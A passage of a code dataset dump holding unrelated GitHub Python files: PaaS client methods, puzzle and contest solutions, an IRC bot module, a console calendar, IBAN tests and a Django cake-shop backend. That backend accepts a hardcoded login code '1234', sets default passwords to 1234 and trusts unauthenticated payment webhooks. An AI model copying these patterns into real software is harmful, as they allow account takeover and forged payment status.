region=self.engine_app.region,\n image=build_info.build_image,\n buildpacks=build_info.buildpacks_info,\n revision=version.revision,\n branch=version.version_name,\n stream_channel_id=stream_channel_id,\n source_tar_path=source_tar_path,\n procfile=procfile,\n extra_envs=extra_envs,\n )\n build_process_id = resp.get('uuid')\n return build_process_id\n\n def run_command(\n self, build_id: str, command: str, stream_channel_id: str, operator: str, type_: str, extra_envs: Dict\n ) -> str:\n \"\"\"run a command in a built slug.\"\"\"\n resp = self.ctl_client.app__run_command(\n region=self.engine_app.region,\n app_name=self.engine_app.name,\n build_id=build_id,\n command=command,\n stream_channel_id=stream_channel_id,\n operator=operator,\n type_=type_,\n extra_envs=extra_envs,\n )\n command_id = resp.get(\"uuid\")\n return command_id\n\n def get_command_status(self, 
command_id: str) -> Dict[str, Any]:\n \"\"\"Get current status of command\"\"\"\n resp = self.ctl_client.command__retrieve(\n region=self.engine_app.region, app_name=self.engine_app.name, command_id=command_id\n )\n return resp\n\n def update_config(self, runtime: Dict[str, Any]):\n \"\"\"Update engine-app's config\"\"\"\n payload = {\"runtime\": runtime}\n\n return self.ctl_client.update_app_config(\n app_name=self.engine_app.name,\n region=self.engine_app.region,\n payload=payload,\n )\n\n def create_release(\n self, build_id: str, deployment_id: Optional[str], extra_envs: Dict[str, str], procfile: Dict[str, str]\n ) -> str:\n \"\"\"Create a new release\"\"\"\n resp = self.ctl_client.app__release(\n app_name=self.engine_app.name,\n region=self.engine_app.region,\n build_id=build_id,\n deployment_id=deployment_id,\n extra_envs=extra_envs,\n procfile=procfile,\n )\n return resp['uuid']\n\n def get_release(self, release_id: str) -> dict:\n \"\"\"Get the release object by id\"\"\"\n return self.ctl_client.get_app_release(\n region=self.engine_app.region, app_name=self.engine_app.name, release_id=release_id\n )\n\n def create_build(self, extra_envs: Dict[str, str], procfile: Dict[str, str]) -> str:\n \"\"\"Create the **fake** build for Image Type App\"\"\"\n resp = self.ctl_client.create_build(\n region=self.engine_app.region,\n app_name=self.engine_app.name,\n procfile=procfile,\n env_variables=extra_envs,\n )\n return resp[\"uuid\"]\n\n def get_build(self, build_id: str) -> dict:\n \"\"\"Get the build object by id\"\"\"\n return self.ctl_client.get_app_build(\n region=self.engine_app.region, app_name=self.engine_app.name, build_id=build_id\n )\n\n def get_build_process_status(self, build_process_id: str) -> Dict[str, Any]:\n \"\"\"Get current status of build process\"\"\"\n resp = self.ctl_client.read_build_process_result(\n app_name=self.engine_app.name, region=self.engine_app.region, build_process_id=build_process_id\n )\n return resp\n\n def update_domains(self, domains: List[Dict]):\n \"\"\"Update an engine app's domains\"\"\"\n self.ctl_client.app_domains__update(\n region=self.engine_app.region, app_name=self.engine_app.name, domains=domains\n )\n\n def update_subpaths(self, subpaths: List[Dict]):\n \"\"\"Update an engine app's subpaths\"\"\"\n self.ctl_client.update_app_subpaths(\n region=self.engine_app.region, app_name=self.engine_app.name, subpaths=subpaths\n )\n\n def get_metadata(self) -> Dict[str, Any]:\n \"\"\"Get an engine app's metadata\"\"\"\n config = self.ctl_client.retrieve_app_config(region=self.engine_app.region, app_name=self.engine_app.name)\n return config['metadata'] or {}\n\n def update_metadata(self, metadata_part: Dict[str, Union[str, bool]]):\n \"\"\"Update an engine app's metadata, works like python's dict.update()\n\n :param metadata_part: An dict object which will be merged into app's metadata\n \"\"\"\n self.ctl_client.update_app_metadata(\n region=self.engine_app.region, app_name=self.engine_app.name, payload={'metadata': metadata_part}\n )\n\n def upsert_image_credentials(self, registry: str, username: str, password: str):\n \"\"\"Update an engine app's image credentials, which will be used to pull image.\"\"\"\n self.ctl_client.upsert_image_credentials(\n region=self.engine_app.region,\n app_name=self.engine_app.name,\n credentials={\"registry\": registry, \"username\": username, \"password\": password},\n )\n\n def sync_proc_ingresses(self):\n \"\"\"Sync ingresses configs with engine\"\"\"\n 
self.ctl_client.app_proc_ingress_actions__sync(region=self.engine_app.region, app_name=self.engine_app.name)\n","repo_name":"leafage-collb/bk-paas","sub_path":"apiserver/paasng/paasng/engine/deploy/engine_svc.py","file_name":"engine_svc.py","file_ext":"py","file_size_in_byte":6303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"35912283134","text":"from schema import Schema, And, Use\n\n\nAWS_KEYS_SECRET = 'churn-api-s3-keys'\nDATABASE_SECRET = 'churn-model-mysql'\nS3_BUCKET_NAME = 'churn-model-data-science-logs'\nSCHEMA_NAME = 'churn_model'\nSTAGE_URL = 'stage_url'\nPROD_URL = 'prod_url'\n\nCONFIG_SCHEMA = Schema([{\n    'proba_cutoff': And(Use(float), lambda n: 0.09 <= n <= 0.99)\n}])\n","repo_name":"micahmelling/config-framework","sub_path":"app_settings.py","file_name":"app_settings.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32116642123","text":"\n# software release number\nRELEASE = '0.82'\n\n# information string\nLEFT_INDENT = 10\nMIDDLE_SPACE = 80\nRIGHT_INDENT = 10\n\n# visio diagram steps description\nSWITCH_DESC = 'Switch pairs'\nISL_DESC = 'ISLs, ICLs, IFLs'\nNPIV_DESC = 'NPIV links'\nSTORAGE_DESC = 'Storages'\nSERVER_DESC = 'Servers'\nSWITCH_GROUPS_DESC = 'Switch groups'\n\n# colours for Visio scheme\nHPE_PALETTE = {\n    'green': 'RGB(0,169,103)', \n    'red': 'RGB(255,141,109)', \n    'blue': 'RGB(42,210,201)', \n    'purple': 'RGB(97,71,103)'\n    }\n\nRT_PALETTE = {\n    'grey': 'RGB(123,147,155)',\n    'orange': 'RGB(255,79,18)',\n    'purple': 'RGB(119,0,255)',\n    'black': 'RGB(16,24,40)' \n    }\n\nCOLOUR_PALETTE = HPE_PALETTE\n\n# min connected device match ratio for the switch and the pair switch\nMIN_DEVICE_NUMBER_MATCH_RATIO = 0.5\n# min switch name match ratio for switch and the pair switch \nMIN_SW_NAME_MATCH_RATIO = 0.8\n\n# Directors with 4 slots\nDIR_4SLOTS_TYPE = [77, 121, 165, 179]\n# All directors (8-slots, 4-slots)\nDIRECTOR_TYPE = [42, 62, 77, 120, 121, 165, 166, 179, 180]","repo_name":"KonstantinAlxVlasenko/san_report_automation","sub_path":"san_automation_constants.py","file_name":"san_automation_constants.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41201035646","text":"import os\nfrom PIL import Image\n\n# parse all png files in current directory\ncurrentPath = os.getcwd()\npngFiles = [f for f in os.listdir(currentPath) if os.path.isfile(os.path.join(currentPath, f)) and f.endswith(\"png\")]\n\n# create thumbnails of all images\nTHUMBNAIL_WIDTH = 428\nTHUMBNAIL_MAX_HEIGHT = 400\nIMG_PREFIX = \"2nd/images/screenshots\"\nfor pngFile in pngFiles:\n\t# skip thumbnail files\n\tif pngFile.startswith(\"th-\"):\n\t\tcontinue\n\timg = Image.open(pngFile)\n\tpix = img.size\n\taspect = float(pix[0])/pix[1]\n\tnewSize = (THUMBNAIL_WIDTH, THUMBNAIL_WIDTH/aspect)\n\t# resize further if max height is exceeded\n\tif newSize[1] > THUMBNAIL_MAX_HEIGHT:\n\t\tnewSize = (THUMBNAIL_MAX_HEIGHT*aspect, THUMBNAIL_MAX_HEIGHT)\n\n\tnewSize = (int(newSize[0]), int(newSize[1]))\n\timg = img.resize(newSize, Image.ANTIALIAS)\n\tthPngFile = \"th-\" + pngFile\n\timg.save(thPngFile)\n\t\n\tline = \"{}/{}|{}|{}||{}/{}|{}|{}|click\".format(IMG_PREFIX, thPngFile, newSize[0], newSize[1],\n\t               IMG_PREFIX, pngFile, pix[0], pix[1])\r\n\t\n\tprint(\"{{\"+line+\"}}\")\r\n\t\n","repo_name":"mazbrili/mastersim","sub_path":"www/xml/mastersim/2nd/images/screenshots/generate_image_links.py","file_name":"generate_image_links.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"20703628310","text":"class Solution:\n    def carPooling(self, trips: List[List[int]], capacity: int) -> bool:\n        trips.sort(key=lambda x:x[1])\n        x=[]\n        heapq.heapify(x)\n        l=0\n        while l<len(trips):\n            capacity-=trips[l][0]\n            while len(x)>0 and capacity<0:\n                j=heapq.heappop(x)\n                if j[0]<=trips[l][1]:\n                    capacity+=j[1]\n            if capacity<0:\n                return False\n            heapq.heappush(x,(trips[l][2],trips[l][0]))\n            l+=1\n        return True\n        \n","repo_name":"beimnet777/A2SV","sub_path":"Car Pooling.py","file_name":"Car Pooling.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"20908848584","text":"import uuid\n\nfrom yookassa import Payment as YooPayment\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.db import transaction\nfrom rest_framework.decorators import api_view\nfrom phonenumber_field.serializerfields import PhoneNumberField\nfrom rest_framework.response import Response\nfrom rest_framework.serializers import ModelSerializer, Serializer, CharField, EmailField\nfrom django.contrib.auth import authenticate, login, logout\n\n\nfrom .models import User, Order, OrderCake, Payment\n\n\nclass UserSerializer(Serializer):\n    name = CharField(max_length=100)\n    email = EmailField()\n    phone = PhoneNumberField()\n\n    class Meta:\n        fields = ['name', 'phone', 'email']\n\n\nclass OrderSerializer(ModelSerializer):\n\n    class Meta:\n        model = Order\n        fields = ['address', 'date', 'time', 'delivcomments', ]\n\n\nclass CakeSerializer(ModelSerializer):\n\n    class Meta:\n        model = OrderCake\n        fields = ['levels', 'form', 'topping', 'berries', 'decor', 'words', 'comment', 'cost', ]\n\n\ndef index(request):\n    return render(request, 'index.html')\n\n\ndef register_user(request):\n    if 'name' in request.POST or 'email' in request.POST:\n        user = request.user\n        user.name = request.POST.get('name')\n        user.email = request.POST.get('email')\n        user.save()\n    else:\n        if request.POST['code'] == '1234':\n            try:\n                User.objects.get(phone=request.POST['phone'])\n            except User.DoesNotExist:\n                User.objects.create_user(phone=request.POST['phone'], password=request.POST['code'])\n\n            user = authenticate(request, phone=request.POST['phone'], password=request.POST['code'])\n            if user is not None:\n                login(request, user)\n        else:\n            return redirect('start_page')\n    return redirect('lk')\n\n\ndef logout_view(request):\n    logout(request)\n\n    return redirect('start_page')\n\n\ndef profile(request):\n    orders = request.user.orders.all()\n\n    return render(request, 'lk.html', {'orders': orders})\n\n\n@transaction.atomic\n@api_view(['POST'])\ndef register_order(request):\n    request_payload = request.data\n    cake_serializer = CakeSerializer(data=request_payload)\n    cake_serializer.is_valid(raise_exception=True)\n    order_serializer = OrderSerializer(data=request_payload)\n    order_serializer.is_valid(raise_exception=True)\n    user_serializer = UserSerializer(data=request_payload)\n    user_serializer.is_valid(raise_exception=True)\n    user = request.user\n    if not user:\n        user, _ = User.objects.get_or_create(\n            phone=user_serializer.validated_data['phone'],\n            defaults={\n                'name': user_serializer.validated_data['name'],\n                'email': user_serializer.validated_data['email'],\n                'password': 1234\n            },\n        )\n    order, _ = Order.objects.get_or_create(\n        address=order_serializer.validated_data['address'],\n        date=order_serializer.validated_data['date'],\n        time=order_serializer.validated_data['time'],\n        delivcomments=order_serializer.validated_data.get('delivcomments', ''),\n        user=user\n    )\n    cake = OrderCake.objects.create(\n        levels=cake_serializer.validated_data['levels'],\n        form=cake_serializer.validated_data['form'],\n        topping=cake_serializer.validated_data['topping'],\n        berries=cake_serializer.validated_data['berries'],\n        decor=cake_serializer.validated_data['decor'],\n        words=cake_serializer.validated_data.get('words', ''),\n        comment=cake_serializer.validated_data.get('comment', ''),\n        cost=cake_serializer.validated_data['cost'],\n        order=order\n    )\n    payment = Payment.objects.create(order=order)\n    yoo_payment = YooPayment.create({\n        'amount': {\n            'value': f'{cake.cost}',\n            'currency': 'RUB'\n        },\n        'confirmation': {\n            'type': 'redirect',\n            'return_url': request.META.get('HTTP_REFERER')\n        },\n        'capture': True,\n        'description': f'Заказ №{order.id}'\n    }, uuid.uuid4())\n    payment.yookassa_payment_id = yoo_payment.id\n    payment.save()\n    return redirect(yoo_payment.confirmation.confirmation_url)\n\n\n@api_view(['POST'])\ndef payment_update(request):\n    event = request.data.get('event')\n    if event == 'payment.succeeded':\n        status = 'succeeded'\n    elif event == 'payment.canceled':\n        status = 'canceled'\n    elif event == 'payment.waiting_for_capture':\n        status = 'succeeded'\n    else:\n        return Response(status=403)\n    payment = Payment.objects.get(yookassa_payment_id=request.data['object']['id'])\n    payment.status = status\n    payment.save()\n    return Response()\n","repo_name":"Yar59/BakeCake","sub_path":"bakery/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74091889640","text":"import sys\nimport time\nfrom datetime import timedelta\nfrom event import Event\ntry:\n    if sys.version_info > (3, 0, 0):\n        from .basemodule import BaseModule\n    else:\n        from basemodule import BaseModule\nexcept (ImportError, SystemError):\n    from modules.basemodule import BaseModule\n\n\nclass Uptime(BaseModule):\n    def post_init(self):\n        uptime_event = Event(\"__.uptime__\")\n        uptime_event.define(msg_definition=\"^\\\\.uptime\")\n        uptime_event.subscribe(self)\n        self.help = \".uptime (spits out uptime)\"\n        # register ourself to our new custom event\n        self.bot.register_event(uptime_event, self)\n\n        starttime = time.time()\n        localtime = time.localtime()\n\n        if 'uptime' not in self.bot.mem_store:\n            self.bot.mem_store['uptime'] = dict()\n            self.bot.mem_store['uptime']['localtime'] = localtime\n            self.bot.mem_store['uptime']['starttime'] = starttime\n\n    def handle(self, event):\n        self._uptime(event.channel)\n\n    def _uptime(self, channel):\n        # print timedelta(seconds=time.time() - self.starttime)\n        self.say(\n            channel,\n            \"I've been up \" +\n            str(\n                timedelta(\n                    seconds=time.time() -\n                    self.bot.mem_store['uptime']['starttime'])).split(\".\")[0] +\n            \", since \" +\n            time.strftime(\n                \"%a, %d %b %Y %H:%M:%S -0800\",\n                self.bot.mem_store['uptime']['localtime']))\n","repo_name":"hlmtre/pybot","sub_path":"modules/uptime.py","file_name":"uptime.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"18"} +{"seq_id":"19394539982","text":"\r\n#윤년 = True, 아니면 False\r\ndef LeapCheck(year): \r\n    return (year % 4 == 0) and (year % 100 != 0) or 
(year % 400 == 0) \r\n\r\ndef lastDay(year, month):#그 달의 마지막날자를 반환\r\n m = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\r\n if LeapCheck(year):\r\n m[1] = 29\r\n return m[month - 1]\r\n\r\ndef totalDay(year, month, day): #총 날짜 반환\r\n total = 365*(year-1)\r\n\r\n for i in range(1, year): #전년도까지 윤년수\r\n if LeapCheck(i):\r\n total += 1\r\n \r\n for i in range(1, month): #전 달까지 날짜\r\n total += lastDay(year, i)\r\n \r\n return total + day\r\n\r\ndef weekDay(year, month, day): #월=0 ... 일=6\r\n return totalDay(year, month, day) % 7\r\n\r\ndef what_line(year, month, what_day): # 일정을 몇번째줄에 기입할지 반환\r\n line = 1\r\n start = 7 - weekDay(year, month, 1)\r\n while(True):\r\n if(what_day <= start): # 처음줄도 못지나감\r\n return line\r\n else:\r\n start = start + 7\r\n line = line + 1\r\n\r\ndef unicode_check(str): #한글인지 아닌지 확인하고 글자길이 반환\r\n str_len = 0\r\n for i in range(0, len(str)):\r\n check = str[i:i+1]\r\n if( ord(check)>=0 and ord(check)<=128 ): #아스키코드라면\r\n str_len = str_len + 1 # 글자 길이 1\r\n else: #한글이면\r\n str_len = str_len + 2 # 글자 길이 2\r\n return str_len \r\n\r\nbutton = 1 \r\nerror_code = 0\r\nwhile(True):\r\n what_day = 0\r\n \r\n next_line = 0 #몇번째줄인지 알려줌\r\n\r\n if(button == 1): # 다른달력 보기\r\n year = (input(\"\\n출력하고 싶은 년도을 입력해주세요(ex:2021): \"))\r\n if year.isdigit() == False:\r\n error_code = 1\r\n else:\r\n year = int(year)\r\n month = (input(\"출력하고 싶은 월을 입력해주세요(ex:06): \"))\r\n if month.isdigit() == False:\r\n error_code = 1\r\n else:\r\n month = int(month)\r\n if(month>0 and month<13): \r\n schedule = [[[0 for col in range(6)] for row in range(7)] for depth in range(5)] #schedule[5][7][6] = 0\r\n sp = [0]*31 #날짜 일정갯수 0초기화\r\n else:\r\n error_code = 2 \r\n\r\n elif(button == 2): # 일정추가\r\n what_day = (input(\"추가하고 싶은 일정의 날짜를 입력하세요(ex:13): \"))\r\n if what_day.isdigit() == False:\r\n error_code = 1\r\n else:\r\n what_day = int(what_day) \r\n\r\n if( (what_day < 1) or (what_day > lastDay(year,month)) ): #입력이 불가한 경우\r\n error_code = 2\r\n elif(sp[what_day-1] == 5):\r\n error_code = 3\r\n\r\n else:\r\n y = weekDay(year, month, what_day)#요일\r\n x = what_line(year, month, what_day)-1 # 몇번째줄\r\n\r\n schedule[sp[what_day-1]][y][x] = input(\"일정을 입력해주세요(5개까지 가능합니다.): \")\r\n if(unicode_check(schedule[sp[what_day-1]][y][x]) > 16):\r\n error_code = 4\r\n schedule[sp[what_day-1]][y][x] = 0 #다시 0으로 초기화\r\n else:\r\n sp[what_day-1] = sp[what_day-1] + 1 \r\n\r\n # 일정을 삭제함과 더불어 원래있던 숫자를 1씩올려주어야함\r\n elif(button == 3): #일정삭제\r\n del_day = (input(\"삭제하고 싶은 일정의 날짜를 알려주세요(ex:19): \"))\r\n if del_day.isdigit() == False:\r\n error_code = 1\r\n else:\r\n del_day = int(del_day)\r\n if( (del_day < 1) or (del_day > lastDay(year,month)) ):\r\n error_code = 2\r\n \r\n else: \r\n del_weekDay = weekDay(year, month, del_day) #요일\r\n del_num = (input(\"몇번째 일정을 삭제하시겠습니까?(ex:3): \"))\r\n if del_num.isdigit() == False:\r\n error_code = 1\r\n else:\r\n del_num = int(del_num)\r\n\r\n if( (del_num < 0) or (del_num > sp[del_day-1]) ):\r\n error_code = 5\r\n \r\n else:\r\n del_num = del_num - 1\r\n for i in range(del_num, 4): #사라진 일정을 빼고 차례대로 올리기\r\n schedule[i][del_weekDay][what_line(year, month, del_day)-1]=schedule[i+1][del_weekDay][what_line(year, month, del_day)-1]\r\n schedule[4][del_weekDay][what_line(year, month, del_day)-1] = 0\r\n sp[del_day-1] = sp[del_day-1] -1\r\n\r\n else:\r\n error_code = 6\r\n\r\n if(error_code == 0):\r\n print('=' * 148)\r\n print(' '*67, year, \"년 \", month, \"월\")\r\n print('=' * 148)\r\n print(' '*9, \"일\", ' '*17, \"월\", ' '*17, \"화\", ' '*17, \"수\", ' '*17, \"목\", ' '*17, \"금\", ' '*17, 
\"토\")\r\n print('=' * 148)\r\n\r\n for i in range(weekDay(year, month, 1)): \r\n print(' '*21, end = '')\r\n\r\n for i in range(1, lastDay(year, month) + 1): # i가 1부터 해당 달의 마지막 날짜의 수까지 변하는 동안\r\n print(' '*9,\"%2d\"%(i),' '*8, end = '') \r\n if weekDay(year, month, i) == 6 or i == lastDay(year, month): #다음줄로 넘어감\r\n \r\n for i in range(0, 5): #6번 반복\r\n print()\r\n for j in range(0, 7): #7번 반복\r\n if(schedule[i][j][next_line] != 0): #문자열이 들어있다면 \r\n print(i+1,schedule[i][j][next_line],' '*(16-unicode_check(schedule[i][j][next_line])),'|', end='') #문자열의 길이만큼빼서 출력\r\n\r\n else: #문자열이 안들어있다면\r\n print(' '*19,'|', end='')\r\n\r\n next_line = next_line + 1 \r\n print()\r\n print('_'*148) \r\n\r\n #error가 났다면 달력은 출력하지 않고 error코드 출력 \r\n else: \r\n print(\"\\n ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\")\r\n print(\"|  오류 발생!                   [-][口][×]|\") \r\n print(\"| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|\")\r\n if(error_code == 1):\r\n print(\"| 숫자를 입력 바랍니다. |\")\r\n elif(error_code == 2):\r\n print(\"| 날짜가 알맞지 않습니다. 다시 입력바랍니다. |\")\r\n elif(error_code == 3): \r\n print(\"| 일정이 가득 찼습니다. 더이상 채울 수 없습니다. |\") \r\n elif(error_code == 4): \r\n print(\"| 글자수가 초과되었습니다. 글자수를 줄여주십시오. |\")\r\n elif(error_code == 5):\r\n print(\"| 삭제 할 일정이 없습니다. |\")\r\n else:\r\n print(\"| 버튼 숫자가 알맞지 않습니다. |\") \r\n print(\"|                           |\")\r\n print(\"|                           |\")\r\n print(\" ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\\n\") \r\n error_code = 0\r\n\r\n button = int(input(\"1)다른달력보기\\n2)일정추가\\n3)일정삭제\\n4)종료\\n1,2,3,4 중 원하는 숫자를 입력후 enter클릭: \"))\r\n if(button == 4):\r\n break\r\n \r\n","repo_name":"softwareyong/2021learningfair","sub_path":"diary.py","file_name":"diary.py","file_ext":"py","file_size_in_byte":7969,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7535540485","text":"#!/usr/bin/python\n\ndef triple():\n '''Find all words with 3 double letters in a row. 
From,\n    http://greenteapress.com/thinkpython/html/thinkpython010.html\n    http://www.cartalk.com/content/puzzlers '''\n    fin = open('./words.txt') ## word list to parse\n    for word in fin:\n        word = word.strip()\n        char = 0\n        length = len(word)\n        while (char <= length - 6) and (length >=6):\n            if word[char] == word[char+1]:\n                if word[char+2] == word[char+3]:\n                    if word[char+4] == word[char+5]:\n                        return(word)\n            char+=1\n\ntriple()\n\n\n\n\n","repo_name":"HasBob/IntroPython2015","sub_path":"students/bob/session02/cartalk/tripleletters.py","file_name":"tripleletters.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25583697189","text":"import sys\nsys.setrecursionlimit(1 << 25)\nread = sys.stdin.readline\nra = range\nenu = enumerate\n\n\ndef read_ints():\n    return list(map(int, read().split()))\n\n\ndef read_a_int():\n    return int(read())\n\n\ndef read_tuple(H):\n    '''\n    H is number of rows\n    '''\n    ret = []\n    for _ in range(H):\n        ret.append(tuple(map(int, read().split())))\n    return ret\n\n\ndef read_col(H):\n    '''\n    H is number of rows\n    A列、B列が与えられるようなとき\n    ex1)A,B=read_col(H) ex2) A,=read_col(H) #一列の場合\n    '''\n    ret = []\n    for _ in range(H):\n        ret.append(list(map(int, read().split())))\n    return tuple(map(list, zip(*ret)))\n\n\ndef read_matrix(H):\n    '''\n    H is number of rows\n    '''\n    ret = []\n    for _ in range(H):\n        ret.append(list(map(int, read().split())))\n    return ret\n    # return [list(map(int, read().split())) for _ in range(H)]  # 内包表記はpypyでは遅いため\n\n\ndef read_map(H):\n    '''\n    H is number of rows\n    文字列で与えられた盤面を読み取る用\n    '''\n    return [read()[:-1] for _ in range(H)]\n\n\ndef read_map_as_int(H):\n    '''\n    # →1,.→0として読み込む\n    '''\n    ret = []\n    for _ in range(H):\n        ret.append([1 if s == '#' else 0 for s in read()[:-1]])\n        # 内包表記はpypyでは若干遅いことに注意\n        # #numpy使うだろうからこれを残しておくけど\n    return ret\n\n\nMOD = 10**9 + 7\nINF = 2**63  # 2147483648 > 10**9\n# default import\nfrom collections import defaultdict, Counter, deque\nfrom operator import itemgetter\nfrom itertools import product, permutations, combinations\nfrom bisect import bisect_left, bisect_right  # , insort_left, insort_right\nfrom heapq import heapify, heappop, heappush, heappushpop\n\n\nclass PriorityQueue:\n    def __init__(self, heap):\n        '''\n        heap ... 
list\n '''\n self.heap = heap\n heapify(self.heap)\n\n def push(self, item):\n heappush(self.heap, item)\n\n def pop(self):\n return heappop(self.heap)\n\n def pushpop(self, item):\n return heappushpop(self.heap, item)\n\n def __call__(self):\n return self.heap\n\n def __len__(self):\n return len(self.heap)\n# s→tまでの最短経路はどうやってみ見つける?\n# grid bfs で 各点への最短距離\n# スタートから各店への最短距離たどってすでにならした地面はコスト0に置換\n# 再びgrid bfsで各店への最短距離を出す\n\n\nH, W = read_ints()\nA = read_matrix(H)\n\n\nmv = {(0, 1), (1, 0), (0, -1), (-1, 0)}\n\n\ndef bfs(A, si, sj):\n min_costs = [[INF] * W for _ in range(H)] # is_visited代わりでもある\n que = PriorityQueue([(0, si, sj)]) # (スタートの座標i,j,cost)\n min_costs[si][sj] = 0\n while que:\n c, i, j = que.pop() # cにはi,jまでの最小コスト\n for di, dj in mv:\n ni, nj = i + di, j + dj\n if not (0 <= ni < H and 0 <= nj < W):\n continue\n nc = c + A[ni][nj]\n if min_costs[ni][nj] <= nc: # >は通す\n continue\n min_costs[ni][nj] = nc\n que.push((nc, ni, nj))\n return min_costs\n\n\nmin_costs1 = bfs(A, H - 1, 0)\nmin_costs2 = bfs(A, 0, W - 1)\nmin_costs3 = bfs(A, H - 1, W - 1)\nans = INF\nfor i, j in product(range(H), range(W)):\n tmp = min_costs1[i][j] + min_costs2[i][j] + min_costs3[i][j] - 2 * A[i][j]\n ans = min(ans, tmp)\n\n\nprint(ans)\n","repo_name":"masakiaota/kyoupuro","sub_path":"virtual/past201912-open/j/j2.py","file_name":"j2.py","file_ext":"py","file_size_in_byte":3431,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"6216845994","text":"import pytest\n\nfrom app.src.exceptions import NonAlphaNumericError, InvalidCountryError, InvalidLengthError\nfrom app.src.validation import (\n _format_iban_string,\n _check_iban_length,\n _iban_string_to_integer,\n iban_is_valid,\n)\n\nVALID_IBAN = \"AL35202111090000000001234567\"\n\n\ndef test_iban_is_valid():\n \"\"\"Test the main validation function\"\"\"\n\n assert iban_is_valid(iban=VALID_IBAN)\n assert not iban_is_valid(iban=\"AL35202111090000000001234568\")\n\n with pytest.raises(NonAlphaNumericError):\n iban_is_valid(iban=VALID_IBAN + \"!\")\n with pytest.raises(InvalidLengthError):\n iban_is_valid(iban=VALID_IBAN + \"1\")\n with pytest.raises(InvalidCountryError):\n iban_is_valid(iban=\"XX35202111090000000001234567\")\n\n\ndef test_format_iban_string():\n \"\"\"Test formatting function\"\"\"\n assert _format_iban_string(iban=VALID_IBAN) == VALID_IBAN\n assert _format_iban_string(iban=\"al 352021 110900000000 01234567\") == VALID_IBAN\n with pytest.raises(NonAlphaNumericError):\n _format_iban_string(iban=\"!! aa .<.<. 
01234567\")\n\n\ndef test_iban_length_is_valid():\n \"\"\"Test length checking function\"\"\"\n _check_iban_length(iban=VALID_IBAN, country=\"AL\")\n with pytest.raises(InvalidLengthError):\n _check_iban_length(iban=VALID_IBAN + \"1\", country=\"AL\")\n\n\ndef test_iban_string_to_integer():\n \"\"\"Test string to integer conversion function\"\"\"\n assert _iban_string_to_integer(iban=\"AAAA123\") == 12310101010\n\n","repo_name":"kofhagstrom/iban-validator","sub_path":"tests/test_iban_validator.py","file_name":"test_iban_validator.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29761022406","text":"from logging import getLogger\nfrom settings import AB_TEST_REQUEST_NAME, AB_TEST_CONTEXT_NAME, AB_TEST_FAIL_SILENT_CONTEXT, AB_TEST_LOGGER_CONTEXT\n\nclass StringFacade(str):\n def __init__(self, raw):\n str.__init__(self, raw.name)\n self.raw = raw\n\nclass TestFacade(StringFacade):\n def __init__(self, raw):\n StringFacade.__init__(self, raw)\n\n @property\n def goals(self):\n return self.raw.goals.all()\n\nclass ExperimentFacade(StringFacade):\n def __init__(self, raw):\n StringFacade.__init__(self, raw)\n self.test = None\n\n @property\n def experiments(self):\n if not self.test:\n return None\n return self.test.experiments.all()\n\nlogger = getLogger(AB_TEST_LOGGER_CONTEXT)\n\ndef ab(request):\n #noinspection PyBroadException\n try:\n if hasattr(request, AB_TEST_REQUEST_NAME):\n experiments = {}\n for test, result in getattr(request, AB_TEST_REQUEST_NAME).items():\n exp = ExperimentFacade(result.experiment)\n exp.test = test\n experiments[TestFacade(test)] = exp\n return {AB_TEST_CONTEXT_NAME : experiments}\n except Exception as ex:\n logger.error(\"error, putting abTest [%s] into context: %s\", AB_TEST_CONTEXT_NAME, ex)\n if not AB_TEST_FAIL_SILENT_CONTEXT:\n raise\n\n return {}\n","repo_name":"camillo/django-abTest","sub_path":"abTest/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"24650732733","text":"from .keys import PEXELS_API_KEY, OPEN_WEATHER_API_KEY\nimport requests\nimport json\n\n\ndef get_photo(city):\n # Use the Pexels API\n header = {\"Authorization\": PEXELS_API_KEY}\n param = {\"query\": city}\n url = \"https://api.pexels.com/v1/search\"\n response = requests.get(url, params=param, headers=header)\n content = json.loads(response.content)\n try:\n return {\"picture_url\": content[\"photos\"][0][\"src\"][\"original\"]}\n except (KeyError, IndexError):\n return {\"picture_url\": None}\n\n\ndef get_weather_data(city, state):\n geocoding_params = {\n \"q\": f\"{city},{state},US\",\n \"limit\": 1,\n \"appid\": OPEN_WEATHER_API_KEY,\n }\n geocoding_url = 